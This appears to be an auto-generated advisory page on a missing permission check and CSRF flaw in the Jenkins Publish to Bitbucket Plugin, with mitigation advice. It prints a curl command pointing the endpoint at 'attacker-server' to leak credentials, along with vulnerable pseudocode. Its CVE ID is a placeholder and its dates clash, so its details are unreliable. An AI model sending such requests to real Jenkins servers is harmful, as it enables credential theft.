Jenkins Publish to Bitbucket Plugin Missing Permissions Check CVE-2025-XXXX (Moderate)

Listen to this Post

The CVE-2025-XXXX vulnerability exists within the Jenkins Publish to Bitbucket Plugin. The plugin provides an HTTP endpoint that lacks any form of permission check, allowing unauthorized access. Attackers with only Overall/Read permissions can exploit this flaw. The endpoint does not verify user permissions before executing its function, which is to connect to a specified HTTP URL using supplied credentials IDs. This allows an attacker to supply a URL they control and use captured credential IDs to exfiltrate sensitive Jenkins credentials. Furthermore, the endpoint is accessible via GET requests, making it susceptible to Cross-Site Request Forgery (CSRF). A simple GET request from a malicious site could trigger the action if an authenticated admin user visits it, leading to credential disclosure without the victim’s knowledge.
Platform: Jenkins Plugin
Version: <= 0.4
Vulnerability : Missing Authorization
Severity: Moderate
date: 2024-10-29

Prediction: 2024-12-15

What Undercode Say:

curl -X GET 'http://jenkins-host/jenkins/userContent/publishBitbucket?url=http://attacker-server&credentialsId=secret-id'
// Pseudocode of vulnerable endpoint
public void doIndex(StaplerRequest req, StaplerResponse rsp) {
String url = req.getParameter("url");
String credId = req.getParameter("credentialsId");
// NO PERMISSION CHECK
Credentials creds = CredentialsProvider.findCredentialById(credId, ...);
publishToBitbucket(url, creds); // Sends credentials to attacker
}

How Exploit:

Attacker tricks authenticated user into visiting a malicious webpage. The page sends a forged GET request to the vulnerable Jenkins endpoint. The endpoint, lacking CSRF protection and permission checks, uses Jenkins credentials to connect to an attacker-controlled server, thereby leaking the credentials.

Protection from this CVE:

Upgrade plugin when patched. Until then, restrict Overall/Read permissions. Remove the plugin if unused. Implement network segmentation for Jenkins.

Impact:

Credential Theft, Unauthorized Access, Data Exfiltration. Attackers can steal credentials stored in Jenkins, potentially compromising linked systems like Bitbucket.

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top